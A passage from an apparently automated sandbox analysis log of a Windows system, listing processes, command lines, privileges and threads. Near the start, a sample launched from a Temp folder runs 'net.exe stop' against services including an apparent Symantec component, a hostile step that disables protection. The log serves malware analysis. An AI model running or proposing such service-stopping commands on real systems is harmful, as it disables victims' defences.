"CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 134 os_tid = 0xc74 Process: id = "46" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x7b2e1000" os_pid = "0xc9c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop MMS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 393 os_tid = 0xca0 Process: id = "47" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0xbbe6000" os_pid = "0xca4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop ccSetMgr /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 394 os_tid = 0xca8 Process: id = "48" image_name = "System" filename = "" page_root = "0x187000" os_pid = "0x4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "created_daemon" parent_id = "34" os_parent_pid = "0xffffffffffffffff" cmd_line = "" cur_dir = "" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 140 os_tid = 0x478 Thread: id = 141 os_tid = 0x580 Thread: id = 142 os_tid = 0xc4 Thread: id = 143 os_tid = 0xd0 Thread: id = 144 os_tid = 0xc0 Thread: id = 145 os_tid = 0x18 Thread: id = 146 os_tid = 0x358 Thread: id = 147 os_tid = 0x1c Thread: id = 148 os_tid = 0x50 Thread: id = 149 os_tid = 0x7c Thread: id = 150 os_tid = 0x60 Thread: id = 151 os_tid = 0xd4 Thread: id = 152 os_tid = 0x328 Thread: id = 153 os_tid = 0x340 Thread: id = 154 os_tid = 0xa0 Thread: id = 155 os_tid = 0x650 Thread: id = 156 os_tid = 0x468 Thread: id = 157 os_tid = 0x584 Thread: id = 158 os_tid = 0x0 Thread: id = 159 os_tid = 0x648 Thread: id = 160 os_tid = 0x54c Thread: id = 161 os_tid = 0x570 Thread: id = 162 os_tid = 0x20 Thread: id = 163 os_tid = 0x474 Thread: id = 164 os_tid = 0x7f8 Thread: id = 165 os_tid = 0xf8 Thread: id = 166 os_tid = 0x24 Thread: id = 167 os_tid = 0x6f8 Thread: id = 168 os_tid = 0x6e4 Thread: id = 169 os_tid = 0x6d4 Thread: id = 170 os_tid = 0x6c4 Thread: id = 171 os_tid = 0x6b4 Thread: id = 172 os_tid = 0x6ac Thread: id = 173 os_tid = 0x84 Thread: id = 174 os_tid = 0x650 Thread: id = 175 os_tid = 0x590 Thread: id = 176 os_tid = 0x94 Thread: id = 177 os_tid = 0x488 Thread: id = 178 os_tid = 0x470 Thread: id = 179 os_tid = 0x68 Thread: id = 180 os_tid = 0x138 Thread: id = 181 os_tid = 0x3d8 Thread: id = 182 os_tid = 0x9c Thread: id = 183 os_tid = 0x88 Thread: id = 184 os_tid = 0x8c Thread: id = 185 os_tid = 0x5c Thread: id = 186 os_tid = 0x78 Thread: id = 187 os_tid = 0x308 Thread: id = 188 os_tid = 0x28c Thread: id = 189 os_tid = 0x74 Thread: id = 190 os_tid = 0x98 Thread: id = 191 os_tid = 0x34 Thread: id = 192 os_tid = 0x100 Thread: id = 193 os_tid = 0x198 Thread: id = 194 os_tid = 0x80 Thread: id = 195 os_tid = 0x158 Thread: id = 196 os_tid = 0x154 Thread: id = 197 os_tid = 0x150 Thread: id = 198 os_tid = 0x120 Thread: id = 199 os_tid = 0x90 Thread: id = 200 os_tid = 0x4c Thread: id = 201 os_tid = 0x130 Thread: id = 202 os_tid = 0x128 Thread: id = 203 os_tid = 0x124 Thread: id = 204 os_tid = 0x11c Thread: id = 205 os_tid = 0x118 Thread: id = 206 os_tid = 0xc4 Thread: id = 207 os_tid = 0x44 Thread: id = 208 os_tid = 0x28 Thread: id = 209 os_tid = 0x40 Thread: id = 210 os_tid = 0x2c Thread: id = 211 os_tid = 0x48 Thread: id = 212 os_tid = 0x38 Thread: id = 213 os_tid = 0xb8 Thread: id = 214 os_tid = 0x3c Thread: id = 215 os_tid = 0xc0 Thread: id = 216 os_tid = 0xb0 Thread: id = 217 os_tid = 0x30 Thread: id = 218 os_tid = 0x8 Thread: id = 591 os_tid = 0xbc Thread: id = 665 os_tid = 0xe80 Thread: id = 1336 os_tid = 0x35c Thread: id = 1384 os_tid = 0xedc Thread: id = 1394 os_tid = 0xa6c Thread: id = 1426 os_tid = 0xcc Process: id = "49" image_name = "services.exe" filename = "c:\\windows\\system32\\services.exe" page_root = "0x1bb25000" os_pid = "0x1d8" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "created_daemon" parent_id = "34" os_parent_pid = "0x178" cmd_line = "C:\\Windows\\system32\\services.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 219 os_tid = 0xb90 Thread: id = 220 os_tid = 0xb70 Thread: id = 221 os_tid = 0xb6c Thread: id = 222 os_tid = 0xb60 Thread: id = 223 os_tid = 0xb5c Thread: id = 224 os_tid = 0x4e8 Thread: id = 225 os_tid = 0x4dc Thread: id = 226 os_tid = 0x4d0 Thread: id = 227 os_tid = 0x378 Thread: id = 228 os_tid = 0x288 Thread: id = 229 os_tid = 0x24c Thread: id = 230 os_tid = 0x238 Thread: id = 231 os_tid = 0x234 Thread: id = 232 os_tid = 0x228 Thread: id = 233 os_tid = 0x224 Thread: id = 234 os_tid = 0x220 Thread: id = 235 os_tid = 0x21c Thread: id = 395 os_tid = 0xcc4 Thread: id = 401 os_tid = 0xcec Thread: id = 402 os_tid = 0xcf0 Thread: id = 415 os_tid = 0xd88 Thread: id = 827 os_tid = 0x11cc Thread: id = 952 os_tid = 0x1384 Thread: id = 986 os_tid = 0xc28 Thread: id = 1353 os_tid = 0xf5c Thread: id = 1356 os_tid = 0xc04 Process: id = "50" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xccc3000" os_pid = "0x250" os_integrity_level = "0x4000" os_privileges = "0x60b00080" monitor_reason = "child_process" parent_id = "49" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k DcomLaunch" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\DcomLaunch" [0xa], "NT SERVICE\\PlugPlay" [0xe], "NT SERVICE\\Power" [0xa], "NT AUTHORITY\\Logon Session 00000000:00006e7a" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 236 os_tid = 0xab8 Thread: id = 237 os_tid = 0x708 Thread: id = 238 os_tid = 0x690 Thread: id = 239 os_tid = 0x2a0 Thread: id = 240 os_tid = 0x29c Thread: id = 241 os_tid = 0x284 Thread: id = 242 os_tid = 0x280 Thread: id = 243 os_tid = 0x27c Thread: id = 244 os_tid = 0x278 Thread: id = 245 os_tid = 0x274 Thread: id = 246 os_tid = 0x268 Thread: id = 247 os_tid = 0x260 Thread: id = 248 os_tid = 0x254 Thread: id = 1339 os_tid = 0x4e8 Thread: id = 1341 os_tid = 0xf08 Process: id = "51" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x1a2ff000" os_pid = "0x294" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "49" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k RPCSS" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\RpcEptMapper" [0xe], "NT SERVICE\\RpcSs" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b49c" [0xc000000f], "LOCAL" [0x7] Thread: id = 249 os_tid = 0x728 Thread: id = 250 os_tid = 0x3f8 Thread: id = 251 os_tid = 0x2c0 Thread: id = 252 os_tid = 0x2bc Thread: id = 253 os_tid = 0x2b8 Thread: id = 254 os_tid = 0x2b4 Thread: id = 255 os_tid = 0x2ac Thread: id = 256 os_tid = 0x2a4 Thread: id = 257 os_tid = 0x298 Thread: id = 1008 os_tid = 0x1258 Thread: id = 1065 os_tid = 0xe44 Thread: id = 1066 os_tid = 0x7c8 Thread: id = 1077 os_tid = 0xcb8 Thread: id = 1086 os_tid = 0xce8 Thread: id = 1095 os_tid = 0x1268 Thread: id = 1233 os_tid = 0xd08 Thread: id = 1234 os_tid = 0x4c4 Thread: id = 1235 os_tid = 0x1234 Thread: id = 1236 os_tid = 0x118c Thread: id = 1237 os_tid = 0x1238 Thread: id = 1238 os_tid = 0x1244 Thread: id = 1239 os_tid = 0xf20 Thread: id = 1405 os_tid = 0xe1c Thread: id = 1417 os_tid = 0x13b0 Process: id = "52" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x24f0e000" os_pid = "0x2c8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "49" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b7a5" [0xc000000f], "LOCAL" [0x7] Thread: id = 258 os_tid = 0xb8c Thread: id = 259 os_tid = 0xac4 Thread: id = 260 os_tid = 0x3b4 Thread: id = 261 os_tid = 0x36c Thread: id = 262 os_tid = 0x408 Thread: id = 263 os_tid = 0x5f8 Thread: id = 264 os_tid = 0x5f0 Thread: id = 265 os_tid = 0x5ec Thread: id = 266 os_tid = 0x5d0 Thread: id = 267 os_tid = 0x12c Thread: id = 268 os_tid = 0x170 Thread: id = 269 os_tid = 0x3c0 Thread: id = 270 os_tid = 0x3b8 Thread: id = 271 os_tid = 0x3a8 Thread: id = 272 os_tid = 0x2fc Thread: id = 273 os_tid = 0x2f8 Thread: id = 274 os_tid = 0x2e4 Thread: id = 275 os_tid = 0x2dc Thread: id = 276 os_tid = 0x2d4 Thread: id = 277 os_tid = 0x2cc Thread: id = 823 os_tid = 0x1184 Thread: id = 837 os_tid = 0xd70 Thread: id = 926 os_tid = 0x13dc Thread: id = 927 os_tid = 0xc40 Thread: id = 953 os_tid = 0x116c Thread: id = 955 os_tid = 0x8e4 Thread: id = 1276 os_tid = 0x4c0 Thread: id = 1395 os_tid = 0x4bc Process: id = "53" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xad16000" os_pid = "0x338" os_integrity_level = "0x4000" os_privileges = "0x60b16080" monitor_reason = "child_process" parent_id = "49" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xe], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\IPBusEnum" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\UxSms" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000bc99" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 278 os_tid = 0x308 Thread: id = 279 os_tid = 0x790 Thread: id = 280 os_tid = 0x330 Thread: id = 281 os_tid = 0x638 Thread: id = 282 os_tid = 0x554 Thread: id = 283 os_tid = 0x748 Thread: id = 284 os_tid = 0x72c Thread: id = 285 os_tid = 0x720 Thread: id = 286 os_tid = 0x668 Thread: id = 287 os_tid = 0x65c Thread: id = 288 os_tid = 0x144 Thread: id = 289 os_tid = 0x110 Thread: id = 290 os_tid = 0x3f0 Thread: id = 291 os_tid = 0x3ec Thread: id = 292 os_tid = 0x3e4 Thread: id = 293 os_tid = 0x3e0 Thread: id = 294 os_tid = 0x3d0 Thread: id = 295 os_tid = 0x3cc Thread: id = 296 os_tid = 0x398 Thread: id = 297 os_tid = 0x394 Thread: id = 298 os_tid = 0x384 Thread: id = 299 os_tid = 0x380 Thread: id = 300 os_tid = 0x368 Thread: id = 301 os_tid = 0x350 Thread: id = 302 os_tid = 0x33c Thread: id = 985 os_tid = 0xad8 Thread: id = 1340 os_tid = 0x1174 Thread: id = 1342 os_tid = 0x1170 Process: id = "54" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x972d000" os_pid = "0xc8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "49" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dde1" [0xc000000f], "LOCAL" [0x7] Thread: id = 303 os_tid = 0xb3c Thread: id = 304 os_tid = 0x570 Thread: id = 305 os_tid = 0x768 Thread: id = 306 os_tid = 0x764 Thread: id = 307 os_tid = 0x758 Thread: id = 308 os_tid = 0x724 Thread: id = 309 os_tid = 0x718 Thread: id = 310 os_tid = 0x714 Thread: id = 311 os_tid = 0x630 Thread: id = 312 os_tid = 0x154 Thread: id = 313 os_tid = 0x150 Thread: id = 314 os_tid = 0x120 Thread: id = 315 os_tid = 0x118 Thread: id = 316 os_tid = 0xf0 Thread: id = 1278 os_tid = 0xae8 Thread: id = 1371 os_tid = 0xde0 Thread: id = 1380 os_tid = 0x10e0 Thread: id = 1412 os_tid = 0x1154 Process: id = "55" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x9236000" os_pid = "0x11c" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "child_process" parent_id = "49" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k NetworkService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\CryptSvc" [0xa], "NT SERVICE\\Dnscache" [0xe], "NT SERVICE\\LanmanWorkstation" [0xa], "NT SERVICE\\napagent" [0xa], "NT SERVICE\\NlaSvc" [0xa], "NT SERVICE\\TapiSrv" [0xa], "NT SERVICE\\TermService" [0xa], "NT SERVICE\\Wecsvc" [0xa], "NT SERVICE\\WinRM" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e33a" [0xc000000f], "LOCAL" [0x7] Thread: id = 317 os_tid = 0xbb0 Thread: id = 318 os_tid = 0xb4c Thread: id = 319 os_tid = 0x248 Thread: id = 320 os_tid = 0x548 Thread: id = 321 os_tid = 0x750 Thread: id = 322 os_tid = 0x6a0 Thread: id = 323 os_tid = 0x68c Thread: id = 324 os_tid = 0x680 Thread: id = 325 os_tid = 0x66c Thread: id = 326 os_tid = 0x614 Thread: id = 327 os_tid = 0x5fc Thread: id = 328 os_tid = 0x188 Thread: id = 329 os_tid = 0x140 Thread: id = 330 os_tid = 0x128 Thread: id = 331 os_tid = 0x2b0 Thread: id = 332 os_tid = 0x214 Thread: id = 333 os_tid = 0x130 Thread: id = 334 os_tid = 0x218 Thread: id = 335 os_tid = 0x1cc Thread: id = 409 os_tid = 0xd6c Thread: id = 826 os_tid = 0xb48 Thread: id = 1335 os_tid = 0x1084 Process: id = "56" image_name = "spoolsv.exe" filename = "c:\\windows\\system32\\spoolsv.exe" page_root = "0x7c150000" os_pid = "0x47c" os_integrity_level = "0x4000" os_privileges = "0x20a00080" monitor_reason = "child_process" parent_id = "49" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\spoolsv.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Spooler" [0xe], "NT AUTHORITY\\Logon Session 00000000:00010a1b" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 336 os_tid = 0x9e4 Thread: id = 337 os_tid = 0x4b8 Thread: id = 338 os_tid = 0x4b4 Thread: id = 339 os_tid = 0x498 Thread: id = 340 os_tid = 0x494 Thread: id = 341 os_tid = 0x480 Thread: id = 413 os_tid = 0xd80 Thread: id = 416 os_tid = 0xd8c Thread: id = 417 os_tid = 0xd90 Thread: id = 418 os_tid = 0xd94 Thread: id = 420 os_tid = 0xd9c Thread: id = 421 os_tid = 0xda0 Thread: id = 425 os_tid = 0xdb4 Thread: id = 426 os_tid = 0xdb8 Thread: id = 427 os_tid = 0xdbc Thread: id = 428 os_tid = 0xdd8 Thread: id = 429 os_tid = 0xddc Thread: id = 430 os_tid = 0xde0 Thread: id = 432 os_tid = 0xde8 Thread: id = 435 os_tid = 0xe1c Process: id = "57" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x35aa000" os_pid = "0x4bc" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "child_process" parent_id = "49" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalServiceNoNetwork" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BFE" [0xe], "NT SERVICE\\DPS" [0xa], "NT SERVICE\\MpsSvc" [0xa], "NT SERVICE\\pla" [0xa], "NT SERVICE\\WwanSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0001106d" [0xc000000f], "LOCAL" [0x7], "NT AUTHORITY\\WRITE RESTRICTED" [0x7] Thread: id = 342 os_tid = 0x324 Thread: id = 343 os_tid = 0x7d8 Thread: id = 344 os_tid = 0x744 Thread: id = 345 os_tid = 0x740 Thread: id = 346 os_tid = 0x73c Thread: id = 347 os_tid = 0x6d8 Thread: id = 348 os_tid = 0x63c Thread: id = 349 os_tid = 0x62c Thread: id = 350 os_tid = 0x628 Thread: id = 351 os_tid = 0x624 Thread: id = 352 os_tid = 0x61c Thread: id = 353 os_tid = 0x610 Thread: id = 354 os_tid = 0x5e8 Thread: id = 355 os_tid = 0x5c8 Thread: id = 356 os_tid = 0x5c0 Thread: id = 357 os_tid = 0x5a0 Thread: id = 358 os_tid = 0x4f8 Thread: id = 359 os_tid = 0x4ec Thread: id = 360 os_tid = 0x4e0 Thread: id = 361 os_tid = 0x4d4 Thread: id = 362 os_tid = 0x4c4 Thread: id = 363 os_tid = 0x4c0 Process: id = "58" image_name = "taskhost.exe" filename = "c:\\windows\\system32\\taskhost.exe" page_root = "0xded000" os_pid = "0x4c8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "49" os_parent_pid = "0x1d8" cmd_line = "\"taskhost.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 364 os_tid = 0xb54 Thread: id = 365 os_tid = 0x54c Thread: id = 366 os_tid = 0x7f0 Thread: id = 367 os_tid = 0x794 Thread: id = 368 os_tid = 0x784 Thread: id = 369 os_tid = 0x77c Thread: id = 370 os_tid = 0x778 Thread: id = 371 os_tid = 0x770 Thread: id = 372 os_tid = 0x500 Thread: id = 373 os_tid = 0x4fc Thread: id = 374 os_tid = 0x4f4 Thread: id = 375 os_tid = 0x4d8 Thread: id = 376 os_tid = 0x4cc Thread: id = 419 os_tid = 0xd98 Thread: id = 422 os_tid = 0xda4 Thread: id = 423 os_tid = 0xda8 Thread: id = 431 os_tid = 0xde4 Thread: id = 536 os_tid = 0x1104 Thread: id = 539 os_tid = 0x1110 Thread: id = 542 os_tid = 0x1130 Thread: id = 543 os_tid = 0x1134 Thread: id = 546 os_tid = 0x1140 Thread: id = 547 os_tid = 0x1144 Thread: id = 553 os_tid = 0x1194 Thread: id = 554 os_tid = 0x1198 Thread: id = 574 os_tid = 0x1270 Thread: id = 575 os_tid = 0x1274 Thread: id = 588 os_tid = 0x1310 Thread: id = 592 os_tid = 0x13a0 Thread: id = 682 os_tid = 0x1340 Thread: id = 683 os_tid = 0x1348 Thread: id = 684 os_tid = 0x1350 Thread: id = 685 os_tid = 0x1358 Thread: id = 686 os_tid = 0x1360 Thread: id = 687 os_tid = 0x1368 Thread: id = 688 os_tid = 0x1370 Thread: id = 689 os_tid = 0x1380 Thread: id = 690 os_tid = 0x5f4 Thread: id = 956 os_tid = 0x69c Thread: id = 958 os_tid = 0xd38 Thread: id = 959 os_tid = 0xe5c Thread: id = 960 os_tid = 0x7e4 Thread: id = 1402 os_tid = 0xc78 Thread: id = 1411 os_tid = 0x3b8 Process: id = "59" image_name = "taskhost.exe" filename = "c:\\windows\\system32\\taskhost.exe" page_root = "0x5d926000" os_pid = "0xbc0" os_integrity_level = "0x4000" os_privileges = "0x40800000" monitor_reason = "child_process" parent_id = "49" os_parent_pid = "0x1d8" cmd_line = "taskhost.exe $(Arg0)" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT TASK\\Microsoft-Windows-SideShow-AutoWake" [0xe], "NT TASK\\Microsoft-Windows-SideShow-SystemDataProviders" [0xe], "NT TASK\\Microsoft-Windows-Customer Experience Improvement Program-UsbCeip" [0xe], "NT TASK\\Microsoft-Windows-Ras-MobilityManager" [0xe], "NT TASK\\Microsoft-Windows-PerfTrack-BackgroundConfigSurveyor" [0xe], "NT TASK\\Microsoft-Windows-RAC-RacTask" [0xe], "NT TASK\\Microsoft-Windows-Customer Experience Improvement Program-KernelCeipTask" [0xe], "NT AUTHORITY\\Logon Session 00000000:00055f62" [0xc0000007], "LOCAL" [0x7] Thread: id = 377 os_tid = 0x828 Thread: id = 378 os_tid = 0xbf8 Thread: id = 379 os_tid = 0xbf4 Thread: id = 380 os_tid = 0xbf0 Thread: id = 381 os_tid = 0xbec Thread: id = 382 os_tid = 0xbe8 Thread: id = 383 os_tid = 0xbe4 Thread: id = 384 os_tid = 0xbdc Thread: id = 385 os_tid = 0xbd4 Thread: id = 386 os_tid = 0xbd0 Thread: id = 387 os_tid = 0xbc8 Thread: id = 388 os_tid = 0xbc4 Thread: id = 839 os_tid = 0x1034 Thread: id = 1338 os_tid = 0x63c Process: id = "60" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x78938000" os_pid = "0x9c4" os_integrity_level = "0x4000" os_privileges = "0x40800000" monitor_reason = "child_process" parent_id = "49" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalServiceAndNoImpersonation" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AppIDSvc" [0xa], "NT SERVICE\\FDResPub" [0xa], "NT SERVICE\\FontCache" [0xe], "NT SERVICE\\Mcx2Svc" [0xa], "NT SERVICE\\QWAVE" [0xa], "NT SERVICE\\SCardSvr" [0xa], "NT SERVICE\\SensrSvc" [0xa], "NT SERVICE\\SSDPSRV" [0xa], "NT SERVICE\\TBS" [0xa], "NT SERVICE\\upnphost" [0xa], "NT SERVICE\\wcncsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0005db7e" [0xc000000f], "LOCAL" [0x7] Thread: id = 389 os_tid = 0x848 Thread: id = 390 os_tid = 0xa14 Thread: id = 391 os_tid = 0x798 Thread: id = 392 os_tid = 0x3d4 Thread: id = 396 os_tid = 0xcc8 Thread: id = 397 os_tid = 0xccc Thread: id = 399 os_tid = 0xcd8 Thread: id = 404 os_tid = 0xd18 Thread: id = 405 os_tid = 0xd1c Thread: id = 411 os_tid = 0xd78 Thread: id = 414 os_tid = 0xd84 Thread: id = 448 os_tid = 0x324 Thread: id = 454 os_tid = 0xf44 Thread: id = 469 os_tid = 0x9a4 Thread: id = 473 os_tid = 0x314 Thread: id = 479 os_tid = 0x744 Thread: id = 1381 os_tid = 0xf18 Thread: id = 1382 os_tid = 0xf28 Process: id = "61" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x73bec000" os_pid = "0xcd0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = 